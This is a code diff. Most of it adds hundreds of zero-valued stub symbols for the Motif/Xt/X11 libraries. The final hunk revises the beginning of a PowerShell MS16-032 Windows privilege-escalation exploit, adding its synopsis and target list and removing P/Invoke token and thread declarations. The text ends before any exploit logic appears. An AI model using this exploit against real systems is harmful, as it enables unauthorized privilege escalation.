+int XmTabBoxGetNumRows = 0;
+int _XmTabBoxGetNumRowsColumns = 0;
+int XmTabBoxGetNumTabs = 0;
+int _XmTabBoxGetTabHeight = 0;
+int XmTabBoxGetTabRow = 0;
+int _XmTabBoxGetTabWidth = 0;
+int _XmTabBoxSelectTab = 0;
+int _XmTabBoxStackedGeometry = 0;
+int xmTabBoxWidgetClass = 0;
+int XmTabBoxXYToIndex = 0;
+int xmTabCanvasClassRec = 0;
+int xmTabCanvasWidgetClass = 0;
+int _XmTabCopy = 0;
+int XmTabCreate = 0;
+int XmTabFree = 0;
+int XmTabGetValues = 0;
+int _XmTabListAdd = 0;
+int XmTabListCopy = 0;
+int _XmTabListDelete = 0;
+int XmTabListFree = 0;
+int _XmTabListGetPosition = 0;
+int XmTabListGetTab = 0;
+int XmTabListInsertTabs = 0;
+int XmTabListRemoveTabs = 0;
+int XmTabListReplacePositions = 0;
+int XmTabListTabCount = 0;
+int XmTabSetValue = 0;
+int xmTabStackClassRec = 0;
+int XmTabStackGetSelectedTab = 0;
+int XmTabStackIndexToWidget = 0;
+int XmTabStackSelectTab = 0;
+int xmTabStackWidgetClass = 0;
+int XmTargetsAreCompatible = 0;
+int _XmTargetsToIndex = 0;
+int _XmTearOffB_overrideTranslations = 0;
+int _XmTearOffBPrimClassExtRec = 0;
+int _XmTearOffBtnDownEventHandler = 0;
+int _XmTearOffBtnUpEventHandler = 0;
+int xmTearOffButtonClassRec = 0;
+int xmTearOffButtonWidgetClass = 0;
+int _XmTearOffInitiate = 0;
+int _XmTestTraversability = 0;
+int _XmTextAdjustGC = 0;
+int _XmTextBytesToCharacters = 0;
+int _XmTextChangeBlinkBehavior = 0;
+int _XmTextChangeHOffset = 0;
+int _XmTextChangeVOffset = 0;
+int _XmTextCharactersToBytes = 0;
+int xmTextClassRec = 0;
+int _XmTextClearDestination = 0;
+int XmTextClearSelection = 0;
+int _XmTextConvert = 0;
+int XmTextCopy = 0;
+int XmTextCopyLink = 0;
+int _XmTextCountCharacters = 0;
+int XmTextCut = 0;
+int _XmTextDestinationVisible = 0;
+int _XmTextDisableRedisplay = 0;
+int XmTextDisableRedisplay = 0;
+int _XmTextDrawDestination = 0;
+int _XmTextEnableRedisplay = 0;
+int XmTextEnableRedisplay = 0;
+int _XmTextEventBindings1 = 0;
+int _XmTextEventBindings2 = 0;
+int _XmTextEventBindings3 = 0;
+int _XmTextF_EventBindings1 = 0;
+int _XmTextF_EventBindings2 = 0;
+int _XmTextF_EventBindings3 = 0;
+int xmTextFieldClassRec = 0;
+int XmTextFieldClearSelection = 0;
+int _XmTextFieldConvert = 0;
+int XmTextFieldCopy = 0;
+int XmTextFieldCopyLink = 0;
+int _XmTextFieldCountBytes = 0;
+int _XmTextFieldCountCharacters = 0;
+int XmTextFieldCut = 0;
+int _XmTextFieldDeselectSelection = 0;
+int _XmTextFieldDestinationVisible = 0;
+int _XmTextFieldDrawInsertionPoint = 0;
+int XmTextFieldGetAddMode = 0;
+int XmTextFieldGetBaseline = 0;
+int XmTextFieldGetBaseLine = 0;
+int XmTextFieldGetCursorPosition = 0;
+int _XmTextFieldGetDropReciever = 0;
+int XmTextFieldGetEditable = 0;
+int XmTextFieldGetInsertionPosition = 0;
+int XmTextFieldGetLastPosition = 0;
+int XmTextFieldGetMaxLength = 0;
+int XmTextFieldGetSelection = 0;
+int XmTextFieldGetSelectionPosition = 0;
+int XmTextFieldGetSelectionWcs = 0;
+int XmTextFieldGetString = 0;
+int XmTextFieldGetStringWcs = 0;
+int XmTextFieldGetSubstring = 0;
+int XmTextFieldGetSubstringWcs = 0;
+int _XmTextFieldHandleSecondaryFinished = 0;
+int XmTextFieldInsert = 0;
+int XmTextFieldInsertWcs = 0;
+int _XmTextFieldInstallTransferTrait = 0;
+int _XmTextFieldLoseSelection = 0;
+int XmTextFieldPaste = 0;
+int XmTextFieldPasteLink = 0;
+int XmTextFieldPosToXY = 0;
+int XmTextFieldRemove = 0;
+int XmTextFieldReplace = 0;
+int _XmTextFieldReplaceText = 0;
+int XmTextFieldReplaceWcs = 0;
+int XmTextFieldSetAddMode = 0;
+int _XmTextFieldSetClipRect = 0;
+int _XmTextFieldSetCursorPosition = 0;
+int XmTextFieldSetCursorPosition = 0;
+int _XmTextFieldSetDestination = 0;
+int XmTextFieldSetEditable = 0;
+int XmTextFieldSetHighlight = 0;
+int XmTextFieldSetInsertionPosition = 0;
+int XmTextFieldSetMaxLength = 0;
+int _XmTextFieldSetSel2 = 0;
+int XmTextFieldSetSelection = 0;
+int XmTextFieldSetString = 0;
+int XmTextFieldSetStringWcs = 0;
+int XmTextFieldShowPosition = 0;
+int _XmTextFieldStartSelection = 0;
+int xmTextFieldWidgetClass = 0;
+int XmTextFieldXYToPos = 0;
+int _XmTextFindLineEnd = 0;
+int _XmTextFindScroll = 0;
+int XmTextFindString = 0;
+int _XmTextFindStringBackwards = 0;
+int _XmTextFindStringForwards = 0;
+int XmTextFindStringWcs = 0;
+int _XmTextFPrimClassExtRec = 0;
+int _XmTextFreeContextData = 0;
+int _XmTextFToggleCursorGC = 0;
+int XmTextGetAddMode = 0;
+int _XmTextGetAnchor = 0;
+int XmTextGetBaseline = 0;
+int _XmTextGetBaseLine = 0;
+int XmTextGetBaseLine = 0;
+int _XmTextGetBaselines = 0;
+int XmTextGetCenterline = 0;
+int XmTextGetCursorPosition = 0;
+int _XmTextGetDisplayRect = 0;
+int _XmTextGetDropReciever = 0;
+int XmTextGetEditable = 0;
+int XmTextGetInsertionPosition = 0;
+int XmTextGetLastPosition = 0;
+int _XmTextGetLineTable = 0;
+int XmTextGetMaxLength = 0;
+int _XmTextGetNumberLines = 0;
+int _XmTextGetSel2 = 0;
+int XmTextGetSelection = 0;
+int XmTextGetSelectionPosition = 0;
+int XmTextGetSelectionWcs = 0;
+int XmTextGetSource = 0;
+int XmTextGetString = 0;
+int XmTextGetStringWcs = 0;
+int XmTextGetSubstring = 0;
+int XmTextGetSubstringWcs = 0;
+int _XmTextGetTableIndex = 0;
+int XmTextGetTopCharacter = 0;
+int _XmTextGetTotalLines = 0;
+int _XmTextHandleSecondaryFinished = 0;
+int _XmTextHasDestination = 0;
+int _XmTextInputCreate = 0;
+int _XmTextInputGetSecResData = 0;
+int XmTextInsert = 0;
+int XmTextInsertWcs = 0;
+int _XmTextInstallTransferTrait = 0;
+int _XmTextInvalidate = 0;
+int _XmTextIn_XmTextEventBindings1 = 0;
+int _XmTextIn_XmTextEventBindings2 = 0;
+int _XmTextIn_XmTextEventBindings3 = 0;
+int _XmTextIn_XmTextVEventBindings = 0;
+int _XmTextLineInfo = 0;
+int _XmTextLoseSelection = 0;
+int _XmTextMarginsProc = 0;
+int _XmTextMarkRedraw = 0;
+int _XmTextModifyVerify = 0;
+int _XmTextMovingCursorPosition = 0;
+int _XmTextNeedsPendingDeleteDis = 0;
+int _XmTextNumLines = 0;
+int _XmTextOutLoadGCsAndRecolorCursors = 0;
+int _XmTextOutputCreate = 0;
+int _XmTextOutputGetSecResData = 0;
+int XmTextPaste = 0;
+int XmTextPasteLink = 0;
+int _XmTextPosToLine = 0;
+int XmTextPosToXY = 0;
+int _XmTextPrimClassExtRec = 0;
+int _XmTextRealignLineTable = 0;
+int XmTextRemove = 0;
+int _XmTextReplace = 0;
+int XmTextReplace = 0;
+int XmTextReplaceWcs = 0;
+int _XmTextResetClipOrigin = 0;
+int _XmTextResetIC = 0;
+int XmTextScroll = 0;
+int _XmTextScrollable = 0;
+int XmTextSetAddMode = 0;
+int _XmTextSetCursorPosition = 0;
+int XmTextSetCursorPosition = 0;
+int _XmTextSetDestinationSelection = 0;
+int _XmTextSetEditable = 0;
+int XmTextSetEditable = 0;
+int _XmTextSetHighlight = 0;
+int XmTextSetHighlight = 0;
+int XmTextSetInsertionPosition = 0;
+int XmTextSetMaxLength = 0;
+int _XmTextSetPreeditPosition = 0;
+int _XmTextSetSel2 = 0;
+int XmTextSetSelection = 0;
+int XmTextSetSource = 0;
+int XmTextSetString = 0;
+int XmTextSetStringWcs = 0;
+int _XmTextSetTopCharacter = 0;
+int XmTextSetTopCharacter = 0;
+int _XmTextShouldWordWrap = 0;
+int _XmTextShowPosition = 0;
+int XmTextShowPosition = 0;
+int _XmTextToggleCursorGC = 0;
+int _XmTextToLocaleText = 0;
+int _XmTextUpdateLineTable = 0;
+int _XmTextValidate = 0;
+int _XmTextValueChanged = 0;
+int xmTextWidgetClass = 0;
+int XmTextXYToPos = 0;
+int _XmToggleBCacheCompare = 0;
+int _XmToggleB_defaultTranslations = 0;
+int _XmToggleBGadClassExtRec = 0;
+int _XmToggleB_menuTranslations = 0;
+int _XmToggleBPrimClassExtRec = 0;
+int xmToggleButtonClassRec = 0;
+int xmToggleButtonGadgetClass = 0;
+int xmToggleButtonGadgetClassRec = 0;
+int XmToggleButtonGadgetGetState = 0;
+int XmToggleButtonGadgetSetState = 0;
+int XmToggleButtonGadgetSetValue = 0;
+int xmToggleButtonGCacheObjClassRec = 0;
+int XmToggleButtonGetState = 0;
+int XmToggleButtonSetState = 0;
+int XmToggleButtonSetValue = 0;
+int xmToggleButtonWidgetClass = 0;
+int _XmToHorizontalPixels = 0;
+int _XmToLayoutDirection = 0;
+int _XmToolTipEnter = 0;
+int XmToolTipGetLabel = 0;
+int _XmToolTipLeave = 0;
+int _XmToolTipRemove = 0;
+int _XmToPanedPixels = 0;
+int _XmTopShadowColorDefault = 0;
+int _XmTopShadowPixmapDefault = 0;
+int _XmToVerticalPixels = 0;
+int XmTrackingEvent = 0;
+int XmTrackingLocate = 0;
+int _XmTrackShellFocus = 0;
+int XmTransferDone = 0;
+int _XmTransferGetDestinationCBStruct = 0;
+int XmTransferSendRequest = 0;
+int XmTransferSetParameters = 0;
+int XmTransferStartRequest = 0;
+int XmTransferValue = 0;
+int _XmTransformSubResources = 0;
+int XmTranslateKey = 0;
+int _XmTraverse = 0;
+int _XmTraverseAway = 0;
+int _XmTraverseDown = 0;
+int _XmTraverseHome = 0;
+int _XmTraverseLeft = 0;
+int _XmTraverseNext = 0;
+int _XmTraverseNextTabGroup = 0;
+int _XmTraversePrev = 0;
+int _XmTraversePrevTabGroup = 0;
+int _XmTraverseRight = 0;
+int _XmTraverseUp = 0;
+int _XmTravGraphAdd = 0;
+int _XmTravGraphRemove = 0;
+int _XmTravGraphUpdate = 0;
+int xmTreeClassRec = 0;
+int xmTreeWidgetClass = 0;
+int XmuNCopyISOLatin1Lowered = 0;
+int _XmUnhighlightBorder = 0;
+int XmUninstallImage = 0;
+int _XmUnitTypeDefault = 0;
+int XmUpdateDisplay = 0;
+int _XmUseColorObj = 0;
+int xmUseVersion = 0;
+int _XmUtf8ToUcs2 = 0;
+int _XmUtilIsSubclassByNameQ = 0;
+int XmVaCreateArrowButton = 0;
+int XmVaCreateArrowButtonGadget = 0;
+int XmVaCreateBulletinBoard = 0;
+int XmVaCreateButtonBox = 0;
+int XmVaCreateCascadeButton = 0;
+int XmVaCreateCascadeButtonGadget = 0;
+int XmVaCreateColorSelector = 0;
+int XmVaCreateColumn = 0;
+int XmVaCreateCombinationBox2 = 0;
+int XmVaCreateComboBox = 0;
+int XmVaCreateCommand = 0;
+int XmVaCreateContainer = 0;
+int XmVaCreateDataField = 0;
+int XmVaCreateDrawingArea = 0;
+int XmVaCreateDrawnButton = 0;
+int XmVaCreateDropDown = 0;
+int XmVaCreateExt18List = 0;
+int XmVaCreateFileSelectionBox = 0;
+int XmVaCreateForm = 0;
+int XmVaCreateFrame = 0;
+int XmVaCreateIconGadget = 0;
+int XmVaCreateLabel = 0;
+int XmVaCreateLabelGadget = 0;
+int XmVaCreateList = 0;
+int XmVaCreateMainWindow = 0;
+int XmVaCreateManagedArrowButton = 0;
+int XmVaCreateManagedArrowButtonGadget = 0;
+int XmVaCreateManagedBulletinBoard = 0;
+int XmVaCreateManagedButtonBox = 0;
+int XmVaCreateManagedCascadeButton = 0;
+int XmVaCreateManagedCascadeButtonGadget = 0;
+int XmVaCreateManagedColorSelector = 0;
+int XmVaCreateManagedColumn = 0;
+int XmVaCreateManagedCombinationBox2 = 0;
+int XmVaCreateManagedComboBox = 0;
+int XmVaCreateManagedCommand = 0;
+int XmVaCreateManagedContainer = 0;
+int XmVaCreateManagedDataField = 0;
+int XmVaCreateManagedDrawingArea = 0;
+int XmVaCreateManagedDrawnButton = 0;
+int XmVaCreateManagedDropDown = 0;
+int XmVaCreateManagedExt18List = 0;
+int XmVaCreateManagedFileSelectionBox = 0;
+int XmVaCreateManagedForm = 0;
+int XmVaCreateManagedFrame = 0;
+int XmVaCreateManagedIconGadget = 0;
+int XmVaCreateManagedLabel = 0;
+int XmVaCreateManagedLabelGadget = 0;
+int XmVaCreateManagedList = 0;
+int XmVaCreateManagedMainWindow = 0;
+int XmVaCreateManagedMessageBox = 0;
+int XmVaCreateManagedMultiList = 0;
+int XmVaCreateManagedNotebook = 0;
+int XmVaCreateManagedPanedWindow = 0;
+int XmVaCreateManagedPushButton = 0;
+int XmVaCreateManagedPushButtonGadget = 0;
+int XmVaCreateManagedRowColumn = 0;
+int XmVaCreateManagedScale = 0;
+int XmVaCreateManagedScrollBar = 0;
+int XmVaCreateManagedScrolledWindow = 0;
+int XmVaCreateManagedSelectionBox = 0;
+int XmVaCreateManagedSeparator = 0;
+int XmVaCreateManagedSeparatorGadget = 0;
+int XmVaCreateManagedSimpleSpinBox = 0;
+int XmVaCreateManagedSpinBox = 0;
+int XmVaCreateManagedTabStack = 0;
+int XmVaCreateManagedText = 0;
+int XmVaCreateManagedTextField = 0;
+int XmVaCreateManagedToggleButton = 0;
+int XmVaCreateManagedToggleButtonGadget = 0;
+int XmVaCreateMessageBox = 0;
+int XmVaCreateMultiList = 0;
+int XmVaCreateNotebook = 0;
+int XmVaCreatePanedWindow = 0;
+int XmVaCreatePushButton = 0;
+int XmVaCreatePushButtonGadget = 0;
+int XmVaCreateRowColumn = 0;
+int XmVaCreateScale = 0;
+int XmVaCreateScrollBar = 0;
+int XmVaCreateScrolledWindow = 0;
+int XmVaCreateSelectionBox = 0;
+int XmVaCreateSeparator = 0;
+int XmVaCreateSeparatorGadget = 0;
+int XmVaCreateSimpleCheckBox = 0;
+int XmVaCreateSimpleMenuBar = 0;
+int XmVaCreateSimpleOptionMenu = 0;
+int XmVaCreateSimplePopupMenu = 0;
+int XmVaCreateSimplePulldownMenu = 0;
+int XmVaCreateSimpleRadioBox = 0;
+int XmVaCreateSimpleSpinBox = 0;
+int XmVaCreateSpinBox = 0;
+int XmVaCreateTabStack = 0;
+int XmVaCreateText = 0;
+int XmVaCreateTextField = 0;
+int XmVaCreateToggleButton = 0;
+int XmVaCreateToggleButtonGadget = 0;
+int _XmValidateFocus = 0;
+int _XmValidCursorIconQuark = 0;
+int _XmValidTimestamp = 0;
+int _XmVaToTypedArgList = 0;
+int _XmVendorExtRealize = 0;
+int xmVendorShellExtClassRec = 0;
+int xmVendorShellExtObjectClass = 0;
+int _XmVersionString = 0;
+int _XmVirtKeys_acornFallbackBindingString = 0;
+int _XmVirtKeys_apolloFallbackBindingString = 0;
+int _XmVirtKeys_dblclkFallbackBindingString = 0;
+int _XmVirtKeys_decFallbackBindingString = 0;
+int _XmVirtKeysDestroy = 0;
+int _XmVirtKeys_dgFallbackBindingString = 0;
+int _XmVirtKeys_fallbackBindingString = 0;
+int _XmVirtKeysHandler = 0;
+int _XmVirtKeys_hpFallbackBindingString = 0;
+int _XmVirtKeys_ibmFallbackBindingString = 0;
+int _XmVirtKeys_ingrFallbackBindingString = 0;
+int _XmVirtKeysInitialize = 0;
+int _XmVirtKeysLoadFallbackBindings = 0;
+int _XmVirtKeysLoadFileBindings = 0;
+int _XmVirtKeys_megatekFallbackBindingString = 0;
+int _XmVirtKeys_motorolaFallbackBindingString = 0;
+int _XmVirtKeys_sgiFallbackBindingString = 0;
+int _XmVirtKeys_siemens9733FallbackBindingString = 0;
+int _XmVirtKeys_siemensWx200FallbackBindingString = 0;
+int _XmVirtKeys_sunFallbackBindingString = 0;
+int _XmVirtKeys_tekFallbackBindingString = 0;
+int _XmVirtualToActualKeysym = 0;
+int _XmWarning = 0;
+int _XmWarningMsg = 0;
+int _XmWhitePixel = 0;
+int _XmWidgetFocusChange = 0;
+int XmWidgetGetBaselines = 0;
+int XmWidgetGetDisplayRect = 0;
+int _XmWidgetIsTraversable = 0;
+int xmWorldClass = 0;
+int xmWorldClassRec = 0;
+int xmWorldObjectClass = 0;
+int _XmWriteDragBuffer = 0;
+int _XmWriteDSToStream = 0;
+int _XmWriteInitiatorInfo = 0;
+int _XmXftDrawCreate = 0;
+int _XmXftDrawDestroy = 0;
+int _XmXftDrawString = 0;
+int _XmXftDrawString2 = 0;
+int _XmXftFontAverageWidth = 0;
+int _XmXftGetXftColor = 0;
+int _XmXftSetClipRectangles = 0;
+int _Xmxpmatoui = 0;
+int _XmxpmColorKeys = 0;
+int _XmxpmCreateImageFromPixmap = 0;
+int _XmxpmCreatePixmapFromImage = 0;
+int _XmxpmDataTypes = 0;
+int _XmxpmFreeColorTable = 0;
+int _XmxpmFreeRgbNames = 0;
+int _XmxpmGetCmt = 0;
+int _XmxpmGetRgbName = 0;
+int _XmxpmGetString = 0;
+int _XmxpmHashIntern = 0;
+int _XmxpmHashSlot = 0;
+int _XmxpmHashTableFree = 0;
+int _XmxpmHashTableInit = 0;
+int _XmxpmInitAttributes = 0;
+int _XmxpmInitXpmImage = 0;
+int _XmxpmInitXpmInfo = 0;
+int _XmxpmNextString = 0;
+int _XmxpmNextUI = 0;
+int _XmxpmNextWord = 0;
+int _XmxpmParseColors = 0;
+int _XmxpmParseData = 0;
+int _XmxpmParseDataAndCreate = 0;
+int _XmxpmParseExtensions = 0;
+int _XmxpmParseHeader = 0;
+int _XmxpmParseValues = 0;
+int _XmxpmReadRgbNames = 0;
+int _XmxpmSetAttributes = 0;
+int _XmxpmSetInfo = 0;
+int _XmxpmSetInfoMask = 0;
+int _Xmxpm_xynormalizeimagebits = 0;
+int _Xmxpm_znormalizeimagebits = 0;
+int XNextEvent = 0;
+int XOffsetRegion = 0;
+int XOMOfOC = 0;
+int XOpenDisplay = 0;
+int XOpenIM = 0;
+int XParseColor = 0;
+int XPeekEvent = 0;
+int XPending = 0;
+int Xpms_popen = 0;
+int XPolygonRegion = 0;
+int XPutBackEvent = 0;
+int XPutImage = 0;
+int XQueryBestCursor = 0;
+int XQueryColor = 0;
+int XQueryColors = 0;
+int XQueryPointer = 0;
+int XQueryTree = 0;
+int XRaiseWindow = 0;
+int XReadBitmapFileData = 0;
+int XRecolorCursor = 0;
+int XRectInRegion = 0;
+int XReparentWindow = 0;
+int XrmCombineDatabase = 0;
+int XrmDestroyDatabase = 0;
+int XrmGetStringDatabase = 0;
+int XrmPermStringToQuark = 0;
+int XrmPutResource = 0;
+int XrmPutStringResource = 0;
+int XrmQGetResource = 0;
+int XrmQGetSearchList = 0;
+int XrmQGetSearchResource = 0;
+int XrmQuarkToString = 0;
+int XrmStringToQuark = 0;
+int XrmUniqueQuark = 0;
+int XRotateBuffers = 0;
+int XSaveContext = 0;
+int XScreenCount = 0;
+int XScreenNumberOfScreen = 0;
+int XScreenOfDisplay = 0;
+int XSelectInput = 0;
+int XSendEvent = 0;
+int XSetClipMask = 0;
+int XSetClipOrigin = 0;
+int XSetClipRectangles = 0;
+int XSetCloseDownMode = 0;
+int XSetErrorHandler = 0;
+int XSetFillStyle = 0;
+int XSetForeground = 0;
+int XSetFunction = 0;
+int XSetICFocus = 0;
+int XSetICValues = 0;
+int XSetInputFocus = 0;
+int XSetLineAttributes = 0;
+int XSetLocaleModifiers = 0;
+int XSetOCValues = 0;
+int XSetRegion = 0;
+int XSetSelectionOwner = 0;
+int XSetStipple = 0;
+int XSetTextProperty = 0;
+int XSetTSOrigin = 0;
+int XSetWindowBackground = 0;
+int XSetWindowBackgroundPixmap = 0;
+int XSetWMColormapWindows = 0;
+int XShapeCombineMask = 0;
+int XShapeCombineRectangles = 0;
+int XShapeQueryExtension = 0;
+int __xstat64 = 0;
+int XStoreBuffer = 0;
+int XStoreColor = 0;
+int XStringToKeysym = 0;
+int XSubtractRegion = 0;
+int XSync = 0;
+int XtAddCallback = 0;
+int XtAddEventHandler = 0;
+int XtAddGrab = 0;
+int XtAddRawEventHandler = 0;
+int XtAllocateGC = 0;
+int XtAppAddTimeOut = 0;
+int XtAppAddWorkProc = 0;
+int XtAppCreateShell = 0;
+int XtAppErrorMsg = 0;
+int XtAppGetExitFlag = 0;
+int XtAppGetSelectionTimeout = 0;
+int XtAppLock = 0;
+int XtAppNextEvent = 0;
+int XtAppPending = 0;
+int XtAppProcessEvent = 0;
+int XtAppSetSelectionTimeout = 0;
+int XtAppSetTypeConverter = 0;
+int XtAppSetWarningMsgHandler = 0;
+int XtAppUnlock = 0;
+int XtAppWarningMsg = 0;
+int XtAugmentTranslations = 0;
+int XtBuildEventMask = 0;
+int XtCallActionProc = 0;
+int XtCallCallbackList = 0;
+int XtCallCallbacks = 0;
+int XtCallConverter = 0;
+int XtCalloc = 0;
+int XtCancelSelectionRequest = 0;
+int XtConfigureWidget = 0;
+int XtConvertAndStore = 0;
+int XtConvertCase = 0;
+int XtCreateManagedWidget = 0;
+int XtCreatePopupShell = 0;
+int XtCreateSelectionRequest = 0;
+int XtCreateWidget = 0;
+int XtCreateWindow = 0;
+int XtCvtStringToFontSet = 0;
+int XtCvtStringToFontStruct = 0;
+int XtCvtStringToPixel = 0;
+int XtDatabase = 0;
+int XtDestroyApplicationContext = 0;
+int XtDestroyWidget = 0;
+int XtDisownSelection = 0;
+int XtDispatchEvent = 0;
+int XtDisplayOfObject = 0;
+int XtDisplayStringConversionWarning = 0;
+int XtDisplayToApplicationContext = 0;
+int XtError = 0;
+int XtErrorMsg = 0;
+int XTextExtents = 0;
+int XTextExtents16 = 0;
+int XTextWidth = 0;
+int XTextWidth16 = 0;
+int XtFree = 0;
+int XtGetActionKeysym = 0;
+int XtGetApplicationNameAndClass = 0;
+int XtGetApplicationResources = 0;
+int XtGetConstraintResourceList = 0;
+int XtGetErrorDatabaseText = 0;
+int XtGetGC = 0;
+int XtGetKeysymTable = 0;
+int XtGetMultiClickTime = 0;
+int XtGetResourceList = 0;
+int XtGetSelectionParameters = 0;
+int XtGetSelectionRequest = 0;
+int XtGetSelectionValue = 0;
+int XtGetSelectionValueIncremental = 0;
+int XtGetSelectionValues = 0;
+int XtGetSelectionValuesIncremental = 0;
+int XtGetSubresources = 0;
+int XtGetSubvalues = 0;
+int XtGetValues = 0;
+int XtGrabButton = 0;
+int XtGrabKey = 0;
+int XtGrabKeyboard = 0;
+int XtGrabPointer = 0;
+int XtHasCallbacks = 0;
+int _XtInherit = 0;
+int _XtInheritTranslations = 0;
+int XtInitializeWidgetClass = 0;
+int XtInsertEventHandler = 0;
+int XtInstallAccelerators = 0;
+int XtIsManaged = 0;
+int XtIsSensitive = 0;
+int XtIsSubclass = 0;
+int _XtIsSubclassOf = 0;
+int XtLastEventProcessed = 0;
+int XtLastTimestampProcessed = 0;
+int XtMakeGeometryRequest = 0;
+int XtMakeResizeRequest = 0;
+int XtMalloc = 0;
+int XtManageChild = 0;
+int XtManageChildren = 0;
+int XtMergeArgLists = 0;
+int XtMoveWidget = 0;
+int XtName = 0;
+int XtNameToWidget = 0;
+int XtOverrideTranslations = 0;
+int XtOwnSelection = 0;
+int XtOwnSelectionIncremental = 0;
+int XtParseAcceleratorTable = 0;
+int XtParseTranslationTable = 0;
+int XtPopdown = 0;
+int XtPopup = 0;
+int XtProcessLock = 0;
+int XtProcessUnlock = 0;
+int XtQueryGeometry = 0;
+int XTranslateCoordinates = 0;
+int XtRealizeWidget = 0;
+int XtRealloc = 0;
+int XtRegisterGrabAction = 0;
+int XtReleaseGC = 0;
+int XtRemoveAllCallbacks = 0;
+int XtRemoveCallback = 0;
+int XtRemoveEventHandler = 0;
+int XtRemoveGrab = 0;
+int XtRemoveTimeOut = 0;
+int XtRemoveWorkProc = 0;
+int XtResizeWidget = 0;
+int XtResolvePathname = 0;
+int XtScreenDatabase = 0;
+int XtScreenOfObject = 0;
+int XtSendSelectionRequest = 0;
+int XtSetKeyboardFocus = 0;
+int XtSetKeyTranslator = 0;
+int XtSetMappedWhenManaged = 0;
+int XtSetSelectionParameters = 0;
+int XtSetSensitive = 0;
+int XtSetSubvalues = 0;
+int XtSetTypeConverter = 0;
+int XtSetValues = 0;
+int XtShellStrings = 0;
+int XtStrings = 0;
+int XtTranslateCoords = 0;
+int XtTranslateKey = 0;
+int XtUngrabButton = 0;
+int XtUngrabKey = 0;
+int XtUngrabKeyboard = 0;
+int XtUngrabPointer = 0;
+int XtUnmanageChild = 0;
+int XtUnmanageChildren = 0;
+int XtVaCreateManagedWidget = 0;
+int XtVaCreateWidget = 0;
+int XtVaGetValues = 0;
+int XtVaSetValues = 0;
+int XtWarning = 0;
+int XtWarningMsg = 0;
+int XtWidgetToApplicationContext = 0;
+int XtWindowOfObject = 0;
+int XtWindowToWidget = 0;
+int XUngrabKeyboard = 0;
+int XUngrabPointer = 0;
+int XUngrabServer = 0;
+int XUnionRectWithRegion = 0;
+int XUnionRegion = 0;
+int XUnmapWindow = 0;
+int XUnsetICFocus = 0;
+int Xutf8DrawImageString = 0;
+int Xutf8DrawString = 0;
+int Xutf8TextEscapement = 0;
+int Xutf8TextExtents = 0;
+int Xutf8TextListToTextProperty = 0;
+int XVaCreateNestedList = 0;
+int XWarpPointer = 0;
+int XwcDrawImageString = 0;
+int XwcDrawString = 0;
+int XwcTextEscapement = 0;
+int XwcTextExtents = 0;
+int XWidthOfScreen = 0;
+int XWindowEvent = 0;
+int XWithdrawWindow = 0;
+int overrideShellWidgetClass = 0;
@@ -1,347 +1,371 @@
-# Copyright (c) 2016, Ruben Booren (@FuzzySec)
-# All rights reserved
-Add-Type -TypeDefinition @"
-    using System;
-    using System.Diagnostics;
-    using System.Runtime.InteropServices;
-    using System.Security.Principal;
+#function Invoke-MS16-032 {
+<#
+.SYNOPSIS
+    
+    PowerShell implementation of MS16-032. The exploit targets all vulnerable
+    operating systems that support PowerShell v2+. Credit for the discovery of
+    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
+    
+    Targets:
+    
+    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
+    * Tested on x32 Win7, x64 Win8, x64 2k12R2
+    
+    Notes:
+    
+    * In order for the race condition to succeed the machine must have 2+ CPU
+      cores. If testing in a VM just make sure to add a core if needed mkay.
+    * Want to know more about MS16-032 ==>
+      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

-    [StructLayout(LayoutKind.Sequential)]
-    public struct PROCESS_INFORMATION
-    {
-        public IntPtr hProcess;
-        public IntPtr hThread;
-        public int dwProcessId;
-        public int dwThreadId;
-    }
-
-    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
-    public struct STARTUPINFO
-    {
-        public Int32 cb;
-        public string lpReserved;
-        public string lpDesktop;
-        public string lpTitle;
-        public Int32 dwX;
-        public Int32 dwY;
-        public Int32 dwXSize;
-        public Int32 dwYSize;
-        public Int32 dwXCountChars;
-        public Int32 dwYCountChars;
-        public Int32 dwFillAttribute;
-        public Int32 dwFlags;
-        public Int16 wShowWindow;
-        public Int16 cbReserved2;
-        public IntPtr lpReserved2;
-        public IntPtr hStdInput;
-        public IntPtr hStdOutput;
-        public IntPtr hStdError;
-    }
-
-    [StructLayout(LayoutKind.Sequential)]
-    public struct SQOS
-    {
-        public int Length;
-        public int ImpersonationLevel;
-        public int ContextTrackingMode;
-        public bool EffectiveOnly;
-    }
-
-    public static class Advapi32
-    {
-        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
-        public static extern bool CreateProcessWithLogonW(
-            String userName,
-            String domain,
-            String password,
-            int logonFlags,
-            String applicationName,
-            String commandLine,
-            int creationFlags,
-            int environment,
-            String currentDirectory,
-            ref  STARTUPINFO startupInfo,
-            out PROCESS_INFORMATION processInformation);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool SetThreadToken(
-            ref IntPtr Thread,
-            IntPtr Token);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenThreadToken(
-            IntPtr ThreadHandle,
-            int DesiredAccess,
-            bool OpenAsSelf,
-            out IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenProcessToken(
-            IntPtr ProcessHandle,
-            int DesiredAccess,
-            ref IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public extern static bool DuplicateToken(
-            IntPtr ExistingTokenHandle,
-            int SECURITY_IMPERSONATION_LEVEL,
-            ref IntPtr DuplicateTokenHandle);
-    }
-
-    public static class Kernel32
-    {
-        [DllImport("kernel32.dll")]
-        public static extern uint GetLastError();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentProcess();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentThread();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern int GetThreadId(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        public static extern int GetProcessIdOfThread(IntPtr handle);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int SuspendThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int ResumeThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool TerminateProcess(
-            IntPtr hProcess,
-            uint uExitCode);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
